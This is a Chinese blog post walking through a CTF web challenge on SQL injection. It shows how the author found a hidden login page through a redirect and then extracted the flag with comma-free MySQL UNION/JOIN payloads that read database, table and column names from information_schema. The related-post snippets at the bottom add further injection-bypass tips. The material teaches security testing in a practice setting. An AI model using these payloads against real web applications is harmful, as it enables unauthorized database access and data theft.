“百度杯”CTF比赛 九月场 类型:Web 题目名称:SQLi ---不需要逗号的注入技巧

最新推荐文章于 2024-05-07 10:23:13 发布
最新推荐文章于 2024-05-07 10:23:13 发布
阅读量3.8k 收藏 5
点赞数
分类专栏: ctf 文章标签: “百度杯”CTF比赛 九月场 类型:Web 题目名称:SQL
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34444097/article/details/80253900
版权

今天在i春秋做题的时候遇到了一道非常好的题目,于是在参考了wp的基础上自己复现了一遍,算作一种技巧的学习与收藏吧。
题目i春秋连接:https://www.ichunqiu.com/battalion?t=1&r=54791
访问地址,发现什么都没有,
这里写图片描述
查看页面源代码,发现提示
这里写图片描述
访问地址
http://69ef94c7ef5e47b580ed5c7bae472bc4c3b492503f964143.game.ichunqiu.com/login.php?id=1
得到下面页面
这里写图片描述
我去,不会这就注入进去了吧?!话不多说,上sqlmap,
这里写图片描述
尝试了好多次,发现这就是个假的注入点,果然没那么简单啊,,,,
设置代理,利用工具Burp Suite看看究竟发生了什么,,,
可以看到在访问地址
http://69ef94c7ef5e47b580ed5c7bae472bc4c3b492503f964143.game.ichunqiu.com的时候,302,页面重定向了。
注意看,下面两个图片
这里写图片描述
这里写图片描述
在302重定向回复报文中,url已经改变,原来箭头那里是3l,被重定向到31,6不6,哈哈。并且看到了新的页面地址l0gin.php?id=1
访问地址
http://69ef94c7ef5e47b580ed5c7bae472bc4c3b492503f964143.game.ichunqiu.com/l0gin.php?id=1
得到下图
这里写图片描述
修改参数,再次执行,
这里写图片描述
OK,看来这个确实是一个注入点,再用sqlmap测试,从结果可以看到这既是一个基于布尔的盲注,也是一个基于时间的盲注
这里写图片描述
接着爆数据库,发现无法得到,没办法,只能手工注入了,
这里我选择基于布尔的盲注,因为这样的回显比基于时间的看起来明显。
输入参数
1' and ascii(substr((select database()),1,1))>64 %23
查询数据库名,发现,注入失败,并且,后面的sql语句被过滤掉了,id字段输出的应该就是过滤后的sql语句了
这里写图片描述
从网上看到一篇讲不需要逗号的mysql注入文章,http://wonderkun.cc/index.html/?p=442
于是重新构造payload,如id=-1' union select * from (select group_concat(distinct(table_schema)) from information_schema.tables ) a join (select version() ) b %23
可以看到数据库名称为sqli
这里写图片描述
紧接着,构造payload,获取表名
-1' union select * from (select group_concat(distinct(table_name)) from information_schema.tables where table_schema='sqli') a join (select version() ) b %23
这里写图片描述
构造payload,获取字段名
-1' union select * from (select group_concat(distinct(column_name)) from information_schema.columns where table_schema='sqli' and table_name='users') a join (select version() ) b %23
这里写图片描述
构造payload,获取字段值,得到flag{34303304-de0b-4bad-a0df-84eb8a420df8}
-1' union select * from (select group_concat(distinct(flag_9c861b688330)) from users) a join (select version() ) b %23
这里写图片描述

wkend
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-10.sql注入(get)
woo233的博客
09-19 495
SQL注入攻击指的是通过构建特殊的输入作为参数传入web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。SQL注入的产生原因通常表现在以下几方面:①不当的类型处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交处理不当。
百度CTF比赛 九月 SQLi 解题思路
****的博客
10-15 1110
题目简介 题目名称SQLi 题目内容:后台有获取flag的线索 解题思路 打开地址使用burp抓包发现“l0gin.php?id=1”。 打开“l0gin.php?id=1”地址 使用1’ and ‘1’=‘1(成功)和1’ and ‘1’='2(不成功),说明此处存在sql注入。测试中发现后台过滤了逗号,在这里使用from for代替逗号。 开始注入 猜测数据库名称 猜测数据库名...
2024年网络安全最新100道CTF题目,收好了~(附答案)_ctf选择题,2024年最新给后辈的一点建议
最新发布
2401_84253850的博客
05-07 948
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。如果等保模块学的好,还可以从事等保工程师。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
ctf sql注入关键词绕过【积累中】
热门推荐
Sp4rkW的博客
09-25 2万+
写在前面:这个博客知识点来源于个人ctf练习比赛中积累的知识点及网络中各个博客的总结点,这里做测试和记录 0x00 sql注入理解 SQL注入能使攻击者绕过认证机制,完全控制远程服务器上的数据库。 SQL是结构化查询语言的简称,它是访问数据库的事实标准。目前,大多数Web应用都使用SQL数据库来存放应用程序的数据。几乎所有的Web应用在后台 都使用某种SQL数据库。跟大多数语言一...
CTF常见题型
citytwilight的博客
07-17 3344
CTF常见题型 CTF比赛通常包含的题目类型有七种,包括MISC、PPC、CRYPTO、PWN、REVERSE、WEB、STEGA。 1.MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 2.PPC(Professionally Program Coder)类型,即编程类题目题目涉及到编程算法,相比ACM较为容易。 3.CRYPTO(Cryptography)类型,即密码学,题目考察各种加解密技术,包括古典加密技术、现代加密技术甚至出题者自创加
百度CTF比赛 九月 SQL-writeup
大方子
07-31 2919
  这题自己的收获:用<>隔开敏感字符,绕过防注入   题目界面: 刚开始还是老规矩输入and 1=1  发现被拦截  此外 测试了or 发现也进行了拦截 我们可以用下面的字符来替换 and 和 or and---->&&    ,     or-----> ||       替换后发现可以成功绕过 接下来进行猜字段长度  发...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
CTF-网络挑战使用PHP在Web中进行CTF挑战链接: :
SQLi-CTF-master.zip
04-09
SQLi-CTF-master
Web-CTF-Cheatsheet:Web CTF速查表:cat:
04-29
WEB CTF备忘单 目录 MySQL 微软SQL Oracle SQLite的 PostgreSQL MS Access LFI 上载 序列化 PHP序列化 Python泡菜 Ruby元帅 Ruby YAML Java序列化 .NET序列化 SSTI / CSTI Flask / Jinja2 嫩枝/ Symfony ...
web-ctf-help:脚本集,以帮助基于Webctfs
02-24
Web-CTF-帮助描述一组简单的脚本(目前主要为抓取器),旨在帮助Web CTF。 查找图像源(和替代项),JavaScript源和注释。用法usage: webctf [-h] [-v] [--comments] [--scripts] [--images] [--headers] [--cookies...
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目
03-30
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目
CTF比赛中的常见题型
11-13
CTF比赛中的常见题型目录,给初学者提供学习方向。CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。
百度CTF比赛(十二月)
Root__Liu的博客
04-13 4050
"百度"CTF比赛(十二月) 第一 1、传说中的签到题 解决:把二进制用在线进制转换器转换,发现转为10进制时,和tips2一样,在qq上一查,是CTF官方群,在公告里有一个字符串ZmxhZ3tiMTU5MDI4Yy05NWZmLTRmNzEtYWQ3Yi1jZWY1MTBhMjJkMDB9 用base64解码,得到flag, flag{b159028c-95ff-4f
CTF 简单sql
明月于心的博客
07-25 1226
针对网络安全实验室 注入关该题,写一下自己的思路 打开页面 发现就一句话,那就查看下网页源代码,不查不知道,一查吓一跳,他直接告诉我们做题的思路,就是最古老的手工注入 因为他这里告诉我们 id=1,我觉得他给我们的提示,id不重要,而是后边的话重要,直接告诉我们,类似于这种题,应该怎么做。 好了 ,进入正题 那我们就开始: 那我们就在url 网址中去试,看看他有几个字段,当我们让id=4时,发...
[GYCTF2020]Ezsqli(无列名注入)
weixin_43940853的博客
05-16 5068
[GYCTF2020]Ezsqli 过滤了好多东西,包括用来查询的information关键词,本上就是考虑盲注了 当||后面条件为真时返回Nu1L,为假时返回V&N,这就是判断盲注语句是否成立的关键 接下来就可以写脚本判断表名了 import requests url = 'http://bfd71058-3cf0-4e87-8731-8935a651f051.node3.buuoj.cn/' payload = '2||ascii(substr((select group_concat
SQLI-LAB  的 实战记录(Less 21 - Less 30)
这块盾牌有待改良
07-20 5472
Less - 21 Cookie Injection- Error Based- complex - string Less - 22 Cookie Injection- Error Based- Double Quotes - string
CTF supersqli
艺博东的博客
09-25 1万+
题目来源: 强网 2019 题目描述: 随便注 题目景: http://220.249.52.133:31334 (温馨提示:每次进入URL的端口号都不一样) 1、点击链接进入如下界面 2、‘1’—>提交 3、使用union select 爆字段 —>提交 4、1’;show databases;#—>提交 5、1’;show tables;#—>提交 6、1’;show columns from words;#(查询words表中所有列:)—>提交 7、
Sqli-labs学习第一题
Recar的博客
12-06 1766
很多东西了解一下,然后去用,总会遇到问题,一定不能浅尝辄止,要深入学习下,不能说说,要及时复习,要经常用才不会忘。 一直用 sqlmap,很少手工注入,但是很多时候不是别人写的工具就能解决的,要自己的工具适应不同的景,编写自己的工具,那么首先要手工流程很熟悉才可以。 决定实践一遍 sqli-lab,还有各大平台的CTF都来一遍。 实践是检验真理的唯一标准http://localhost:90
百度CTF比赛 十二月Blog(sql注入
weixin_45620609的博客
06-03 476
百度CTF比赛 十二月Blog 用到的知识点 1.kindeditor编辑器目录遍历漏洞(参数path) 2.insert注入 3.二次注入(代码审计可以看出) 4.PHP内置封装协议——php://filter 解题过程 (为了节省time,绕过弯路,直接上正确的思路) 1.得到链接,是这样一个画面。 2.登录尝试进行爆破,无果。(还是字典不够强大) 3.发现还存在一个注册界面,那就注册一个呗。——用户名:aa 密码——aa(一开始习惯性的注册用户名为admin,发现注册不了,后来明白了,
SQLi-LABS Page-1(Basic Challenges)
07-24
"SQLi-LABS 是一个用于学习和实践 SQL 注入漏洞的平台,提供了基础到高级的挑战。本文档涵盖了第一部分的基础挑战,从 Less-1 到 Less-22,适合网络安全初学者和 CTF 玩家。通过这些关卡,你可以了解和掌握 SQL 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值